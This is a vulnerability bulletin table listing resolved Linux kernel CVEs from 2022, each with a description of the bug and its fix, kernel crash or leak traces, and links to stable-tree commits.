| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: misc: pci_endpoint_test: Fix pci_endpoint_test_{copy,write,read}() panic The dma_map_single() doesn't permit zero length mapping. It causes the following panic. A panic was reported on arm64: [ 60.137988] ------------[ cut here ]------------ [ 60.142630] kernel BUG at kernel/dma/swiotlb.c:624! [ 60.147508] Internal error: Oops - BUG: 0 [#1] PREEMPT SMP [ 60.152992] Modules linked in: dw_hdmi_cec crct10dif_ce simple_bridge rcar_fdp1 vsp1 rcar_vin videobuf2_vmalloc rcar_csi2 v4l 2_mem2mem videobuf2_dma_contig videobuf2_memops pci_endpoint_test videobuf2_v4l2 videobuf2_common rcar_fcp v4l2_fwnode v4l2_asyn c videodev mc gpio_bd9571mwv max9611 pwm_rcar ccree at24 authenc libdes phy_rcar_gen3_usb3 usb_dmac display_connector pwm_bl [ 60.186252] CPU: 0 PID: 508 Comm: pcitest Not tainted 6.0.0-rc1rpci-dev+ #237 [ 60.193387] Hardware name: Renesas Salvator-X 2nd version board based on r8a77951 (DT) [ 60.201302] pstate: 00000005 (nzcv daif -PAN -UAO -TCO -DIT -SSBS BTYPE=--) [ 60.208263] pc : swiotlb_tbl_map_single+0x2c0/0x590 [ 60.213149] lr : swiotlb_map+0x88/0x1f0 [ 60.216982] sp : ffff80000a883bc0 [ 60.220292] x29: ffff80000a883bc0 x28: 0000000000000000 x27: 0000000000000000 [ 60.227430] x26: 0000000000000000 x25: ffff0004c0da20d0 x24: ffff80000a1f77c0 [ 60.234567] x23: 0000000000000002 x22: 0001000040000010 x21: 000000007a000000 [ 60.241703] x20: 0000000000200000 x19: 0000000000000000 x18: 0000000000000000 [ 60.248840] x17: 0000000000000000 x16: 0000000000000000 x15: ffff0006ff7b9180 [ 60.255977] x14: ffff0006ff7b9180 x13: 0000000000000000 x12: 0000000000000000 [ 60.263113] x11: 0000000000000000 x10: 0000000000000000 x9 : 0000000000000000 [ 60.270249] x8 : 0001000000000010 x7 : ffff0004c6754b20 x6 : 0000000000000000 [ 60.277385] x5 : ffff0004c0da2090 x4 : 0000000000000000 x3 : 0000000000000001 [ 60.284521] x2 : 0000000040000000 x1 : 0000000000000000 x0 : 0000000040000010 [ 60.291658] Call trace: [ 60.294100] swiotlb_tbl_map_single+0x2c0/0x590 [ 60.298629] swiotlb_map+0x88/0x1f0 [ 60.302115] dma_map_page_attrs+0x188/0x230 [ 60.306299] pci_endpoint_test_ioctl+0x5e4/0xd90 [pci_endpoint_test] [ 60.312660] __arm64_sys_ioctl+0xa8/0xf0 [ 60.316583] invoke_syscall+0x44/0x108 [ 60.320334] el0_svc_common.constprop.0+0xcc/0xf0 [ 60.325038] do_el0_svc+0x2c/0xb8 [ 60.328351] el0_svc+0x2c/0x88 [ 60.331406] el0t_64_sync_handler+0xb8/0xc0 [ 60.335587] el0t_64_sync+0x18c/0x190 [ 60.339251] Code: 52800013 d2e00414 35fff45c d503201f (d4210000) [ 60.345344] ---[ end trace 0000000000000000 ]--- To fix it, this patch adds a check that rejects a zero payload length. | 2025-12-08 | not yet calculated | CVE-2022-50614 | https://git.kernel.org/stable/c/0df206bdc6204b758585bbe159a55e23e7917b13 https://git.kernel.org/stable/c/e5ebcbb4f967af2083d409271aaf7c7d8351603f https://git.kernel.org/stable/c/279116cb0bc5cd8af65d6a00ffe074bd09842f88 https://git.kernel.org/stable/c/6c01739c2aba19553beb20491b05515af9246f0f https://git.kernel.org/stable/c/8e30538eca016de8e252bef174beadecd64239f0 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: perf/x86/intel/uncore: Fix reference count leak in snr_uncore_mmio_map() pci_get_device() will increase the reference count for the returned pci_dev, so snr_uncore_get_mc_dev() will return a pci_dev with its reference count increased. We need to call pci_dev_put() to decrease the reference count. Let's add the missing pci_dev_put(). | 2025-12-08 | not yet calculated | CVE-2022-50615 | https://git.kernel.org/stable/c/d2afced51108813256d8072c6e464b0c9f0bb890 https://git.kernel.org/stable/c/433bd587dca5c3f7157fef2fe571290cd392cbf6 https://git.kernel.org/stable/c/a67146437b6428069b71a7e5e740a2a8e1c40ac9 https://git.kernel.org/stable/c/dc7f07bc1ebb56a23fd1c4f664db5cbeb8900800 https://git.kernel.org/stable/c/8ebd16c11c346751b3944d708e6c181ed4746c39 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: regulator: core: Use different devices for resource allocation and DT lookup Following the discussion below, there is a potential UAF issue between regulator and mfd. https://lore.kernel.org/all/20221128143601.1698148-1-yangyingliang@huawei.com/ From the analysis of Yingliang CPU A |CPU B mt6370_probe() | devm_mfd_add_devices() | |mt6370_regulator_probe() | regulator_register() | //allocate init_data and add it to devres | regulator_of_get_init_data() i2c_unregister_device() | device_del() | devres_release_all() | // init_data is freed | release_nodes() | | // using init_data causes UAF | regulator_register() It's common to use the mfd core to create a child device for the regulator. In order to do the DT lookup for init data, the child that registered the regulator would pass its parent as the parameter. And this causes the init data resource to be allocated to its parent, not itself. The issue happens when the parent device is going to be released and the regulator core is still doing some operation on the init data constraints for the regulator of the child device. To fix it, this patch expands the 'regulator_register' API to use different devices for init data allocation and DT lookup. | 2025-12-08 | not yet calculated | CVE-2022-50616 | https://git.kernel.org/stable/c/cb29811d989bcb7ea81ca111c4b13878b344e086 https://git.kernel.org/stable/c/b0f25ca1ff9be7abd1679ae7e59a8f25dbffe67a https://git.kernel.org/stable/c/8f3cbcd6b440032ebc7f7d48a1689dcc70a4eb98 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/amdgpu/powerplay/psm: Fix memory leak in power state init Commit 902bc65de0b3 ("drm/amdgpu/powerplay/psm: return an error in power state init") made the power state init function return early in case of failure to get an entry from the powerplay table, but it missed to clean up the allocated memory for the current power state before returning. | 2025-12-08 | not yet calculated | CVE-2022-50617 | https://git.kernel.org/stable/c/1caed03305b560bafea8eaa57f1847791658b3ff https://git.kernel.org/stable/c/7cb8932644438bee992dc898a36ffe155fdc1bfa https://git.kernel.org/stable/c/1c65f8f98148709e08bd6157a807c443ba91f0ac https://git.kernel.org/stable/c/8f8033d5663b18e6efb33feb61f2287a04605ab5 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: mmc: meson-gx: fix return value check of mmc_add_host() mmc_add_host() may return an error; if we ignore its return value, it will lead to two issues: 1. The memory allocated in mmc_alloc_host() is leaked. 2. In the remove() path, mmc_remove_host() will be called to delete the device, but it has not been added yet, which will lead to a kernel crash because of a null-ptr-deref in device_del(). Fix this by checking the return value and going to the error path, which will call mmc_free_host(). | 2025-12-08 | not yet calculated | CVE-2022-50618 | https://git.kernel.org/stable/c/f5506e0bbb25102bd8ef2e1a3b483a0b934e454e https://git.kernel.org/stable/c/9e11c6bb745be4e9b325cf96031b4ea34801342d https://git.kernel.org/stable/c/64b2c441171febf075bd9632aca579afda8ab9fb https://git.kernel.org/stable/c/e0cfe7aa41f3965f5224affd88afd48c60f6ad1f https://git.kernel.org/stable/c/42343e3c6195e934b9cb4c08b7ff84a3778d77f9 https://git.kernel.org/stable/c/f5ce76aeddf01ca8f2a80fc37119388d59db7c10 https://git.kernel.org/stable/c/90935f16f2650ab7416fa2ffbe5c28cb39cf3f1e |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/amdkfd: Fix memory leak in kfd_mem_dmamap_userptr() If the number of pages from the userptr BO differs from the SG BO then the allocated memory for the SG table doesn't get freed before returning -EINVAL, which may lead to a memory leak in some error paths. Fix this by checking the number of pages before allocating memory for the SG table. | 2025-12-08 | not yet calculated | CVE-2022-50619 | https://git.kernel.org/stable/c/304a10161696d86300ceab1cbe72b2d74b8cdd94 https://git.kernel.org/stable/c/c6dc4c9ba093829ebe1450d5fb101da6fb7a2a58 https://git.kernel.org/stable/c/90bfee142af0f0e9d3bec80e7acd5f49b230acf7 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: f2fs: fix to invalidate dcc->f2fs_issue_discard in error path Syzbot reports a NULL pointer dereference issue as below: __refcount_add include/linux/refcount.h:193 [inline] __refcount_inc include/linux/refcount.h:250 [inline] refcount_inc include/linux/refcount.h:267 [inline] get_task_struct include/linux/sched/task.h:110 [inline] kthread_stop+0x34/0x1c0 kernel/kthread.c:703 f2fs_stop_discard_thread+0x3c/0x5c fs/f2fs/segment.c:1638 kill_f2fs_super+0x5c/0x194 fs/f2fs/super.c:4522 deactivate_locked_super+0x70/0xe8 fs/super.c:332 deactivate_super+0xd0/0xd4 fs/super.c:363 cleanup_mnt+0x1f8/0x234 fs/namespace.c:1186 __cleanup_mnt+0x20/0x30 fs/namespace.c:1193 task_work_run+0xc4/0x14c kernel/task_work.c:177 exit_task_work include/linux/task_work.h:38 [inline] do_exit+0x26c/0xbe0 kernel/exit.c:795 do_group_exit+0x60/0xe8 kernel/exit.c:925 __do_sys_exit_group kernel/exit.c:936 [inline] __se_sys_exit_group kernel/exit.c:934 [inline] __wake_up_parent+0x0/0x40 kernel/exit.c:934 __invoke_syscall arch/arm64/kernel/syscall.c:38 [inline] invoke_syscall arch/arm64/kernel/syscall.c:52 [inline] el0_svc_common+0x138/0x220 arch/arm64/kernel/syscall.c:142 do_el0_svc+0x48/0x164 arch/arm64/kernel/syscall.c:206 el0_svc+0x58/0x150 arch/arm64/kernel/entry-common.c:636 el0t_64_sync_handler+0x84/0xf0 arch/arm64/kernel/entry-common.c:654 el0t_64_sync+0x18c/0x190 arch/arm64/kernel/entry.S:581 The root cause of this issue is in error path of f2fs_start_discard_thread(), it missed to invalidate dcc->f2fs_issue_discard, later kthread_stop() may access invalid pointer. | 2025-12-08 | not yet calculated | CVE-2022-50620 | https://git.kernel.org/stable/c/865bb7b5a7deeb0e5afbd82381d52d38825dc64d https://git.kernel.org/stable/c/a3e517a6ba695d683ee63615e1ea6e6b4c7d2732 https://git.kernel.org/stable/c/ae6c960a82c52c3bda5adc82d90643d6c12d308e https://git.kernel.org/stable/c/91586ce0d39a05f88795aa8814fb99b1387236b3 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: dm: verity-loadpin: Only trust verity targets with enforcement Verity targets can be configured to ignore corrupted data blocks. LoadPin must only trust verity targets that are configured to perform some kind of enforcement when data corruption is detected, like returning an error, restarting the system or triggering a panic. | 2025-12-08 | not yet calculated | CVE-2022-50621 | https://git.kernel.org/stable/c/cb1f5b76e39d86c98722696bdf632987aa777b83 https://git.kernel.org/stable/c/916ef6232cc4b84db7082b4c3d3cf1753d9462ba |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ext4: fix potential memory leak in ext4_fc_record_modified_inode() As krealloc may return NULL, in this case 'state->fc_modified_inodes' may not be freed by krealloc, but 'state->fc_modified_inodes' is already set to NULL. This will then lead to a 'state->fc_modified_inodes' memory leak. | 2025-12-08 | not yet calculated | CVE-2022-50622 | https://git.kernel.org/stable/c/c9ce7766dc4e88e624c62a68221a3bbe8f06e856 https://git.kernel.org/stable/c/9b5eb368a86f97eb9831f5b53b8e43ec69bc7cd4 https://git.kernel.org/stable/c/c0be17635f039f864b1108efec0015c73736e414 https://git.kernel.org/stable/c/24d39affc6be1acf6df86a8c3e2413b8a73749c7 https://git.kernel.org/stable/c/9305721a309fa1bd7c194e0d4a2335bf3b29dca4 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: fpga: prevent integer overflow in dfl_feature_ioctl_set_irq() The "hdr.count * sizeof(s32)" multiplication can overflow on 32 bit systems leading to memory corruption. Use array_size() to fix that. | 2025-12-08 | not yet calculated | CVE-2022-50623 | https://git.kernel.org/stable/c/f59861946fa51bcc1f305809e4ebc1013b0ee61c https://git.kernel.org/stable/c/b94605f5cb99e90c8ca91523597a40e1bd59546b https://git.kernel.org/stable/c/1b5a931594f7ffd26d706614c37d4da0f2ffb6e7 https://git.kernel.org/stable/c/940253af8b3865b76de8d1b46bcd4a700104852e https://git.kernel.org/stable/c/939bc5453b8cbdde9f1e5110ce8309aedb1b501a |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: netsec: fix error handling in netsec_register_mdio() If phy_device_register() fails, phy_device_free() needs to be called to put the refcount, so the memory of the phy device and device name can be freed in the callback function. If get_phy_device() fails, mdiobus_unregister() needs to be called, or it will cause a warning in mdiobus_free() and the kobject is leaked. | 2025-12-08 | not yet calculated | CVE-2022-50624 | https://git.kernel.org/stable/c/728884b22d83148a330b23f9472f1e118b589211 https://git.kernel.org/stable/c/fda2d07234a21be4d71ebfe97a45f499726902d6 https://git.kernel.org/stable/c/62f0a08e82a6312efd7df7f595c0b11d4ffde610 https://git.kernel.org/stable/c/1e0bee973ef6fc3c1e3acb014515eaea37c8fa17 https://git.kernel.org/stable/c/846e677daf51220d7975c61a20e440a88473951e https://git.kernel.org/stable/c/94423589689124e8cd145b38a1034be7f25835b2 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: serial: amba-pl011: avoid SBSA UART accessing DMACR register Chapter "B Generic UART" in "ARM Server Base System Architecture" [1] documentation describes a generic UART interface. Such a generic UART does not support DMA. In the current code, sbsa_uart_pops and amba_pl011_pops share the same stop_rx operation, which will invoke pl011_dma_rx_stop, leading to an access of the DMACR register. This commit adds a using_rx_dma check in pl011_dma_rx_stop to avoid the access to the DMACR register for SBSA UARTs, which do not support DMA. When the kernel enables the DMA engine with "CONFIG_DMA_ENGINE=y", the Linux SBSA PL011 driver will access the PL011 DMACR register in some functions. For most real SBSA PL011 hardware implementations, the DMACR write behaviour will be ignored. So these DMACR operations will not cause obvious problems. But for some virtual SBSA PL011 hardware, like the Xen virtual SBSA PL011 (vpl011) device, the behaviour might be different. Xen vpl011 emulation will inject a data abort to the guest when the guest is accessing an unimplemented UART register. As Xen VPL011 is SBSA compatible, it will not implement the DMACR register. So when the Linux SBSA PL011 driver accesses the DMACR register, it will get an unhandled data abort fault and the application will get a segmentation fault: Unhandled fault at 0xffffffc00944d048 Mem abort info: ESR = 0x96000000 EC = 0x25: DABT (current EL), IL = 32 bits SET = 0, FnV = 0 EA = 0, S1PTW = 0 FSC = 0x00: ttbr address size fault Data abort info: ISV = 0, ISS = 0x00000000 CM = 0, WnR = 0 swapper pgtable: 4k pages, 39-bit VAs, pgdp=0000000020e2e000 [ffffffc00944d048] pgd=100000003ffff803, p4d=100000003ffff803, pud=100000003ffff803, pmd=100000003fffa803, pte=006800009c090f13 Internal error: ttbr address size fault: 96000000 [#1] PREEMPT SMP ... Call trace: pl011_stop_rx+0x70/0x80 tty_port_shutdown+0x7c/0xb4 tty_port_close+0x60/0xcc uart_close+0x34/0x8c tty_release+0x144/0x4c0 __fput+0x78/0x220 ____fput+0x1c/0x30 task_work_run+0x88/0xc0 do_notify_resume+0x8d0/0x123c el0_svc+0xa8/0xc0 el0t_64_sync_handler+0xa4/0x130 el0t_64_sync+0x1a0/0x1a4 Code: b9000083 b901f001 794038a0 8b000042 (b9000041) ---[ end trace 83dd93df15c3216f ]--- note: bootlogd[132] exited with preempt_count 1 /etc/rcS.d/S07bootlogd: line 47: 132 Segmentation fault start-stop-daemon This has been discussed in the Xen community, and we think it should be fixed in Linux. See [2] for more information. [1] https://developer.arm.com/documentation/den0094/c/?lang=en [2] https://lists.xenproject.org/archives/html/xen-devel/2022-11/msg00543.html | 2025-12-08 | not yet calculated | CVE-2022-50625 | https://git.kernel.org/stable/c/1c5f0d3f480abd8c26761b6b1f486822e77faea3 https://git.kernel.org/stable/c/a4ea20ab82aa2b197dc7b08f51e1d615578276a0 https://git.kernel.org/stable/c/78d837ce20517e0c1ff3ebe08ad64636e02c2e48 https://git.kernel.org/stable/c/965f07ea5fd1b9591bcccc825a93ad883e56222c https://git.kernel.org/stable/c/d5b16eb076f46c88d02d41ece5bec4e0d89158bb https://git.kernel.org/stable/c/d71a611fca1984c0765f9317ff471ac8cd0e3e2f https://git.kernel.org/stable/c/38a10fdd54d17590d45cb1c43b9889da383b6b1a https://git.kernel.org/stable/c/64bc5dbc3260230e2f022288c71e5c680059384a https://git.kernel.org/stable/c/94cdb9f33698478b0e7062586633c42c6158a786 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: media: dvb-usb: fix memory leak in dvb_usb_adapter_init() Syzbot reports a memory leak in "dvb_usb_adapter_init()". The leak is due to not accounting for and freeing the current iteration's adapter->priv in case of an error. Currently if an error occurs, it will exit before incrementing "num_adapters_initalized", which is used as a reference counter to free all adap->priv in "dvb_usb_adapter_exit()". There are multiple error paths that can exit from before incrementing the counter. Including the error handling paths for "dvb_usb_adapter_stream_init()", "dvb_usb_adapter_dvb_init()" and "dvb_usb_adapter_frontend_init()" within "dvb_usb_adapter_init()". This means that in case of an error in any of these functions the current iteration is not accounted for and the current iteration's adap->priv is not freed. Fix this by freeing the current iteration's adap->priv in the "stream_init_err:" label in the error path. The rest of the (accounted for) adap->priv objects are freed in dvb_usb_adapter_exit() as expected using the num_adapters_initalized variable. Syzbot report: BUG: memory leak unreferenced object 0xffff8881172f1a00 (size 512): comm "kworker/0:2", pid 139, jiffies 4294994873 (age 10.960s) hex dump (first 32 bytes): 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ backtrace: [<ffffffff844af012>] dvb_usb_adapter_init drivers/media/usb/dvb-usb/dvb-usb-init.c:75 [inline] [<ffffffff844af012>] dvb_usb_init drivers/media/usb/dvb-usb/dvb-usb-init.c:184 [inline] [<ffffffff844af012>] dvb_usb_device_init.cold+0x4e5/0x79e drivers/media/usb/dvb-usb/dvb-usb-init.c:308 [<ffffffff830db21d>] dib0700_probe+0x8d/0x1b0 drivers/media/usb/dvb-usb/dib0700_core.c:883 [<ffffffff82d3fdc7>] usb_probe_interface+0x177/0x370 drivers/usb/core/driver.c:396 [<ffffffff8274ab37>] call_driver_probe drivers/base/dd.c:542 [inline] [<ffffffff8274ab37>] really_probe.part.0+0xe7/0x310 drivers/base/dd.c:621 [<ffffffff8274ae6c>] really_probe drivers/base/dd.c:583 [inline] [<ffffffff8274ae6c>] __driver_probe_device+0x10c/0x1e0 drivers/base/dd.c:752 [<ffffffff8274af6a>] driver_probe_device+0x2a/0x120 drivers/base/dd.c:782 [<ffffffff8274b786>] __device_attach_driver+0xf6/0x140 drivers/base/dd.c:899 [<ffffffff82747c87>] bus_for_each_drv+0xb7/0x100 drivers/base/bus.c:427 [<ffffffff8274b352>] __device_attach+0x122/0x260 drivers/base/dd.c:970 [<ffffffff827498f6>] bus_probe_device+0xc6/0xe0 drivers/base/bus.c:487 [<ffffffff82745cdb>] device_add+0x5fb/0xdf0 drivers/base/core.c:3405 [<ffffffff82d3d202>] usb_set_configuration+0x8f2/0xb80 drivers/usb/core/message.c:2170 [<ffffffff82d4dbfc>] usb_generic_driver_probe+0x8c/0xc0 drivers/usb/core/generic.c:238 [<ffffffff82d3f49c>] usb_probe_device+0x5c/0x140 drivers/usb/core/driver.c:293 [<ffffffff8274ab37>] call_driver_probe drivers/base/dd.c:542 [inline] [<ffffffff8274ab37>] really_probe.part.0+0xe7/0x310 drivers/base/dd.c:621 [<ffffffff8274ae6c>] really_probe drivers/base/dd.c:583 [inline] [<ffffffff8274ae6c>] __driver_probe_device+0x10c/0x1e0 drivers/base/dd.c:752 | 2025-12-08 | not yet calculated | CVE-2022-50626 | https://git.kernel.org/stable/c/733bc9e226da2a7f43b10031b8ebfc26d89ec4bd https://git.kernel.org/stable/c/e5a49140035591d13ff57a7537c65217e5af0d15 https://git.kernel.org/stable/c/21b6b0c9f3796e6917e90db403dae9e74025fc40 https://git.kernel.org/stable/c/17217737c174883dd975885ab4bee4b00f517239 https://git.kernel.org/stable/c/7d7ab25ead969594df05fb09ee46ca931d46c5c8 https://git.kernel.org/stable/c/d0af6220bb1eed8225a5511de5a3bd386b94afa4 https://git.kernel.org/stable/c/e5d01eb6dc2f699a395d3e731c58a9b3bb4e269f https://git.kernel.org/stable/c/93bbf2ed428142aa9a9693721230b28571678bf8 https://git.kernel.org/stable/c/94d90fb06b94a90c176270d38861bcba34ce377d |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: wifi: ath11k: fix monitor mode bringup crash When the interface is brought up in monitor mode, it leads to a NULL pointer dereference crash. This crash happens when the packet type is extracted for a SKB. This extraction, which is present in the received msdu delivery path, is not needed for the monitor ring packets since they are all RAW packets. Hence appending the flags with "RX_FLAG_ONLY_MONITOR" to skip that extraction. Observed calltrace: Unable to handle kernel NULL pointer dereference at virtual address 0000000000000064 Mem abort info: ESR = 0x0000000096000004 EC = 0x25: DABT (current EL), IL = 32 bits SET = 0, FnV = 0 EA = 0, S1PTW = 0 FSC = 0x04: level 0 translation fault Data abort info: ISV = 0, ISS = 0x00000004 CM = 0, WnR = 0 user pgtable: 4k pages, 48-bit VAs, pgdp=0000000048517000 [0000000000000064] pgd=0000000000000000, p4d=0000000000000000 Internal error: Oops: 0000000096000004 [#1] PREEMPT SMP Modules linked in: ath11k_pci ath11k qmi_helpers CPU: 2 PID: 1781 Comm: napi/-271 Not tainted 6.1.0-rc5-wt-ath-656295-gef907406320c-dirty #6 Hardware name: Qualcomm Technologies, Inc. IPQ8074/AP-HK10-C2 (DT) pstate: 60000005 (nZCv daif -PAN -UAO -TCO -DIT -SSBS BTYPE=--) pc : ath11k_hw_qcn9074_rx_desc_get_decap_type+0x34/0x60 [ath11k] lr : ath11k_hw_qcn9074_rx_desc_get_decap_type+0x5c/0x60 [ath11k] sp : ffff80000ef5bb10 x29: ffff80000ef5bb10 x28: 0000000000000000 x27: ffff000007baafa0 x26: ffff000014a91ed0 x25: 0000000000000000 x24: 0000000000000000 x23: ffff800002b77378 x22: ffff000014a91ec0 x21: ffff000006c8d600 x20: 0000000000000000 x19: ffff800002b77740 x18: 0000000000000006 x17: 736564203634343a x16: 656e694c20657079 x15: 0000000000000143 x14: 00000000ffffffea x13: ffff80000ef5b8b8 x12: ffff80000ef5b8c8 x11: ffff80000a591d30 x10: ffff80000a579d40 x9 : c0000000ffffefff x8 : 0000000000000003 x7 : 0000000000017fe8 x6 : ffff80000a579ce8 x5 : 0000000000000000 x4 : 0000000000000000 x3 : 0000000000000000 x2 : 3a35ec12ed7f8900 x1 : 0000000000000000 x0 : 0000000000000052 Call trace: ath11k_hw_qcn9074_rx_desc_get_decap_type+0x34/0x60 [ath11k] ath11k_dp_rx_deliver_msdu.isra.42+0xa4/0x3d0 [ath11k] ath11k_dp_rx_mon_deliver.isra.43+0x2f8/0x458 [ath11k] ath11k_dp_rx_process_mon_rings+0x310/0x4c0 [ath11k] ath11k_dp_service_srng+0x234/0x338 [ath11k] ath11k_pcic_ext_grp_napi_poll+0x30/0xb8 [ath11k] __napi_poll+0x5c/0x190 napi_threaded_poll+0xf0/0x118 kthread+0xf4/0x110 ret_from_fork+0x10/0x20 Tested-on: QCN9074 hw1.0 PCI WLAN.HK.2.7.0.1-01744-QCAHKSWPL_SILICONZ-1 | 2025-12-08 | not yet calculated | CVE-2022-50627 | https://git.kernel.org/stable/c/d6ea1ca1d456bb661e5a9d104e69d2c261161115 https://git.kernel.org/stable/c/9089c3080a98f1452335e08b8014a28003a211ce https://git.kernel.org/stable/c/950b43f8bd8a4d476d2da6d2a083a89bcd3c90d7 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/gud: Fix UBSAN warning UBSAN complains about invalid value for bool: [ 101.165172] [drm] Initialized gud 1.0.0 20200422 for 2-3.2:1.0 on minor 1 [ 101.213360] gud 2-3.2:1.0: [drm] fb1: guddrmfb frame buffer device [ 101.213426] usbcore: registered new interface driver gud [ 101.989431] ================================================================================ [ 101.989441] UBSAN: invalid-load in linux/include/linux/iosys-map.h:253:9 [ 101.989447] load of value 121 is not a valid value for type '_Bool' [ 101.989451] CPU: 1 PID: 455 Comm: kworker/1:6 Not tainted 5.18.0-rc5-gud-5.18-rc5 #3 [ 101.989456] Hardware name: Hewlett-Packard HP EliteBook 820 G1/1991, BIOS L71 Ver. 01.44 04/12/2018 [ 101.989459] Workqueue: events_long gud_flush_work [gud] [ 101.989471] Call Trace: [ 101.989474] <TASK> [ 101.989479] dump_stack_lvl+0x49/0x5f [ 101.989488] dump_stack+0x10/0x12 [ 101.989493] ubsan_epilogue+0x9/0x3b [ 101.989498] __ubsan_handle_load_invalid_value.cold+0x44/0x49 [ 101.989504] dma_buf_vmap.cold+0x38/0x3d [ 101.989511] ? find_busiest_group+0x48/0x300 [ 101.989520] drm_gem_shmem_vmap+0x76/0x1b0 [drm_shmem_helper] [ 101.989528] drm_gem_shmem_object_vmap+0x9/0xb [drm_shmem_helper] [ 101.989535] drm_gem_vmap+0x26/0x60 [drm] [ 101.989594] drm_gem_fb_vmap+0x47/0x150 [drm_kms_helper] [ 101.989630] gud_prep_flush+0xc1/0x710 [gud] [ 101.989639] ? _raw_spin_lock+0x17/0x40 [ 101.989648] gud_flush_work+0x1e0/0x430 [gud] [ 101.989653] ? __switch_to+0x11d/0x470 [ 101.989664] process_one_work+0x21f/0x3f0 [ 101.989673] worker_thread+0x200/0x3e0 [ 101.989679] ? rescuer_thread+0x390/0x390 [ 101.989684] kthread+0xfd/0x130 [ 101.989690] ? kthread_complete_and_exit+0x20/0x20 [ 101.989696] ret_from_fork+0x22/0x30 [ 101.989706] </TASK> [ 101.989708] ================================================================================ The source of this warning is in iosys_map_clear() called from dma_buf_vmap(). It conditionally sets values based on map->is_iomem. The iosys_map variables are allocated uninitialized on the stack leading to ->is_iomem having all kinds of values and not only 0/1. Fix this by zeroing the iosys_map variables. | 2025-12-08 | not yet calculated | CVE-2022-50628 | https://git.kernel.org/stable/c/832f861a46039d50536dcfda0a9fb334b48d0f8b https://git.kernel.org/stable/c/e1078b270d218f8d58efb4d78ea25a4d16ba3490 https://git.kernel.org/stable/c/951df98024f7272f85df5044eca7374f5b5b24ef |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: wifi: rsi: Fix memory leak in rsi_coex_attach() The coex_cb needs to be freed when rsi_create_kthread() failed in rsi_coex_attach(). | 2025-12-08 | not yet calculated | CVE-2022-50629 | https://git.kernel.org/stable/c/98259e0b6cf7f021da9fe4e11fbcce6ad6705ffe https://git.kernel.org/stable/c/fe4d7280cf4ddbea6536b596297c07662c7856fc https://git.kernel.org/stable/c/efc8df970561ff708379b89b348e16d3b410cc7b https://git.kernel.org/stable/c/b56e60b3b158a93bc713437e8e466f401ff8cc9f https://git.kernel.org/stable/c/c4f1ded67a90fb3b2e679e2c90b78921d9246044 https://git.kernel.org/stable/c/ace789b1d465fae104cd37e49f6e1bcd1c8ff417 https://git.kernel.org/stable/c/956fb851a6e19da5ab491e19c1bc323bb2c2cf6f |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: mm: hugetlb: fix UAF in hugetlb_handle_userfault The vma_lock and hugetlb_fault_mutex are dropped before handling userfault and reacquire them again after handle_userfault(), but reacquire the vma_lock could lead to UAF[1,2] due to the following race, hugetlb_fault hugetlb_no_page /*unlock vma_lock */ hugetlb_handle_userfault handle_userfault /* unlock mm->mmap_lock*/ vm_mmap_pgoff do_mmap mmap_region munmap_vma_range /* clean old vma */ /* lock vma_lock again <--- UAF */ /* unlock vma_lock */ Since the vma_lock will unlock immediately after hugetlb_handle_userfault(), let's drop the unneeded lock and unlock in hugetlb_handle_userfault() to fix the issue. [1] https://lore.kernel.org/linux-mm/000000000000d5e00a05e834962e@google.com/ [2] https://lore.kernel.org/linux-mm/20220921014457.1668-1-liuzixian4@huawei.com/ | 2025-12-08 | not yet calculated | CVE-2022-50630 | https://git.kernel.org/stable/c/45c33966759ea1b4040c08dacda99ef623c0ca29 https://git.kernel.org/stable/c/0db2efb3bff879566f05341d94c3de00ac95c4cc https://git.kernel.org/stable/c/dd691973f67b2800a97db723b1ff6f07fdcf7f5a https://git.kernel.org/stable/c/78504bcedb2f1bbfb353b4d233c24d641c4dda33 https://git.kernel.org/stable/c/958f32ce832ba781ac20e11bb2d12a9352ea28fc |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: RISC-V: kexec: Fix memory leak of fdt buffer This is reported by kmemleak detector: unreferenced object 0xff60000082864000 (size 9588): comm "kexec", pid 146, jiffies 4294900634 (age 64.788s) hex dump (first 32 bytes): d0 0d fe ed 00 00 12 ed 00 00 00 48 00 00 11 40 ...........H...@ 00 00 00 28 00 00 00 11 00 00 00 02 00 00 00 00 ...(............ backtrace: [<00000000f95b17c4>] kmemleak_alloc+0x34/0x3e [<00000000b9ec8e3e>] kmalloc_order+0x9c/0xc4 [<00000000a95cf02e>] kmalloc_order_trace+0x34/0xb6 [<00000000f01e68b4>] __kmalloc+0x5c2/0x62a [<000000002bd497b2>] kvmalloc_node+0x66/0xd6 [<00000000906542fa>] of_kexec_alloc_and_setup_fdt+0xa6/0x6ea [<00000000e1166bde>] elf_kexec_load+0x206/0x4ec [<0000000036548e09>] kexec_image_load_default+0x40/0x4c [<0000000079fbe1b4>] sys_kexec_file_load+0x1c4/0x322 [<0000000040c62c03>] ret_from_syscall+0x0/0x2 In elf_kexec_load(), a buffer is allocated via kvmalloc() to store the fdt. But it is not freed back to the system when the kexec kernel is reloaded or unloaded, which causes a memory leak. Fix it by introducing the riscv-specific function arch_kimage_file_post_load_cleanup(), and freeing the buffer there. | 2025-12-08 | not yet calculated | CVE-2022-50631 | https://git.kernel.org/stable/c/c66ad198b6497dee8f45d7ed5c03629c4525c7d0 https://git.kernel.org/stable/c/dc387c34d8dd10b02a333df098f8fd9bba177a45 https://git.kernel.org/stable/c/96df59b1ae23f5c11698c3c2159aeb2ecd4944a4 |
